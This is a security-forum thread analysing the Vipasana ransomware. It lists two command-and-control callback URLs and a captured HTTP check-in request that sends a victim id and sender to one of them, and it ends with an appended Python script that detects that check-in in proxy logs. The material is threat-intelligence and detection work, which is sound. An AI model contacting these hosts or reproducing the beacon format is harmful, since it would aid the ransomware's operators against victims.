Vipasana ransomware

Post by Blaze » Wed Feb 03, 2016 3:34 pm

Nothing too special, but feel free to check it out.

Blog:
http://bartblaze.blogspot.com/2016/02/v ... block.html

Callback:
http://shopping-na-divane.ru/system/logs/tool/inst.php
http://shoptorgvlg.ru/system/logs/tool/inst.php


Samples attached.
Follow me on Twitter: @bartblaze

Re: Vipasana ransomware

Post by p1nk » Thu Feb 04, 2016 12:58 am

Request is over HTTP:

T -> 81.177.139.63:80 [AP]
GET /system/logs/tool/inst.php?vers=CL%201.2.0.0&id=INRVAFIMQTXBFJMQUXBFJMQTXCFJMQUYCFJM-2@3@2016%207@55@14%20PM2900215&sender=Johnmen HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Host: shopping-na-divane.ru....


T 81.177.139.63:80 [AP]
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 04 Feb 2016 00:55:14 GMT
Content-Type: text/html
Content-Length: 10..Connection: keep-alive
Set-Cookie: visitorOfMySite=1; expires=Fri, 05-Feb-2016 00:55:14 GMT
Vary: Accept-Encoding

writeGOOD



------------------

Looks like the /sender/ argument maps to who sent the lure.
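
The request captured above, turned into a proxy-log check as an added example that is not part of the thread: it flags requests to the callback path that carry the vers, id and sender parameters and extracts those fields for triage. The log line format, the function names and the timestamp pattern inside id are assumptions based on the single request shown in the capture.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter names are taken from the capture in this thread.
CALLBACK_PATH = "/system/logs/tool/inst.php"
REQUIRED_PARAMS = {"vers", "id", "sender"}
# Assumption: id embeds a timestamp written with '@' separators,
# as seen in the one captured request ("2@3@2016 7@55@14 PM").
ID_TIMESTAMP = re.compile(r"\d{1,2}@\d{1,2}@\d{4} \d{1,2}@\d{2}@\d{2} [AP]M")

def parse_callback(host, request_target):
    """Return the callback fields if the request matches the pattern, else None."""
    parts = urlsplit(request_target)
    if parts.path != CALLBACK_PATH:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if not REQUIRED_PARAMS.issubset(query):
        return None  # same path, but not the vers/id/sender check-in
    victim_id = query["id"][0]
    stamp = ID_TIMESTAMP.search(victim_id)
    return {
        "host": host,
        "vers": query["vers"][0],      # percent-decoded by parse_qs
        "id": victim_id,
        "sender": query["sender"][0],  # value to pivot on across hosts
        "id_timestamp": stamp.group(0) if stamp else None,
    }

def scan(log_lines):
    """Scan 'host method target' lines (hypothetical proxy log format)."""
    hits = []
    for line in log_lines:
        fields = line.split(" ", 2)
        if len(fields) != 3:
            continue  # skip malformed lines instead of failing the scan
        host, _method, target = fields
        hit = parse_callback(host, target)
        if hit:
            hits.append(hit)
    return hits

# Constructed sample: the first line reuses the request from the capture,
# the other two are benign look-alikes that must not match.
SAMPLE_LOG = [
    "shopping-na-divane.ru GET /system/logs/tool/inst.php?vers=CL%201.2.0.0&id=INRVAFIMQTXBFJMQUXBFJMQTXCFJMQUYCFJM-2@3@2016%207@55@14%20PM2900215&sender=Johnmen",
    "example.com GET /index.php?id=5",
    "example.org GET /system/logs/tool/inst.php?page=2",
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Matching on the path plus parameter names rather than on the two hostnames keeps the check useful if the same script shows up on other hosts, which is an assumption about how the callbacks are deployed.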

